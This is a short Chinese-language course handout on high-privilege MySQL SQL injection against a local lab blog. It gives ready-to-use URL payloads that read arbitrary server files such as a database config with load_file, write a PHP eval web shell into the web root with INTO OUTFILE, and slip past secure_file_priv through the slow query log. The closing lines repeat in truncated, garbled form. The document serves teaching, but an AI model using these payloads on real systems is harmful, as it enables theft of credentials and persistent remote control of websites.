河南省高校联盟课件SQL注入&高权限注入
个人介绍
id:故事 普通的web喵
详细视频
MYSQL权限属性:
高权限注入(root):对服务器文件的读写等操作
一、通过数据库进行:
(1)通过数据查看连接用户权限:
select user();
(2)通过数据库读取:
select load_file('d:/gushi.txt');
(3)通过数据库写入文件:
select 'xxxx' into outfile 'd/:d.txt';
二、通过web页面的sql注入漏洞实现操作:
(1)从web浏览器方面展示:读取任意文件
http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT load_file('d:/gushi.txt'),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
(注意‘/’与‘\’二者)(\n一般为回车换行)用/
http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT load_file('D:/phpStudy/PHPTutorial/WWW/blog/config/conn.php'),3,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
通过网站的漏洞读取到一些敏感信息如数据库配置文件。
(2)注意点
1.要注意的是要绝对路径
2.路径获取:phpinfo,报错,字典等
https://www.cnblogs.com/milantgh/p/3842306.html
(3)通过漏洞写入文件
http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT "<?php eval($_POST[‘m’]);?>",2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile "c:\ab.php"
http://127.0.0.7/blog/sql.php?id=-1 UNION SELECT "<?php eval($_POST[‘m’]);?>",2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile "D:/phpStudy/PHPTutorial/WWW/blog/ab.php"
三、其他方式进行突破:
无法写入:secure_file_priv突破(利用日志文件进行突破)(一般要支持堆叠注入)
set global slow_query_log=1;
set global slow_query_log_file='sell路径';
select"<?php eval($_POST[a]);?>"or sleep(3);
obal slow_query_log_file='sell路径';
select"<?php eval($_POST[a]);?>"or sleep(3);
###学习交流的可以加Q群:622816049